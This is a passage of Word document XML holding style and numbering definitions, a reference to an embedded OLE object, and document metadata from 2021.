      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="404040"/>
      <w:u w:val="single" w:color="7F7F7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Internetlink">
    <w:name w:val="Internet link"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:color w:val="6B9F25"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeChar">
    <w:name w:val="code Char"/>
    <w:basedOn w:val="NoSpacingChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
      <w:sz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eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AbtracttitleChar">
    <w:name w:val="Abtracttitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:sz w:val="40"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteSymbol">
    <w:name w:val="Footnote Symbol"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:position w:val="0"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Footnoteanchor">
    <w:name w:val="Footnote anchor"/>
    <w:rPr>
      <w:position w:val="0"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VisitedInternetLink">
    <w:name w:val="Visited Internet Link"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:color w:val="B26B02"/>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Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="2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eastAsia="Calibri" w:cs="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eastAsia="Calibri" w:cs="Calibri"/>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eastAsia="Calibri" w:cs="Calibri"/>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eastAsia="Calibri" w:cs="Calibri"/>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eastAsia="Calibri" w:cs="Calibri"/>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cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IndexLink">
    <w:name w:val="Index Link"/>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numbering" w:customStyle="1" w:styleId="WWNum22">
    <w:name w:val="WWNum22"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="24"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum23">
    <w:name w:val="WWNum23"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="25"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum24">
    <w:name w:val="WWNum24"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="26"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum25">
    <w:name w:val="WWNum25"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="27"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum26">
    <w:name w:val="WWNum26"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="28"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum27">
    <w:name w:val="WWNum27"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="29"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum28">
    <w:name w:val="WWNum28"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="30"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum29">
    <w:name w:val="WWNum29"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="31"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum30">
    <w:name w:val="WWNum30"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="32"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum31">
    <w:name w:val="WWNum31"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="33"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum32">
    <w:name w:val="WWNum32"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="34"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum33">
    <w:name w:val="WWNum33"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="35"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum34">
    <w:name w:val="WWNum34"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="36"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum35">
    <w:name w:val="WWNum35"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="37"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum36">
    <w:name w:val="WWNum36"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="38"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum37">
    <w:name w:val="WWNum37"/>
    <w:basedOn w:val="NoList"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="39"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WWNum38">
    <w:name w:val="WWNum38"/>
    <w:basedOn w:val="NoList"/>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oleObject" Target="embeddings/oleObject2.bin"/><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33</Pages>
  <Words>10961</Words>
  <Characters>62484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Aidan</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-18T09:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T09:56:00Z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TC034577159991</vt:lpwstr>
  </property>
</Properties>
</file>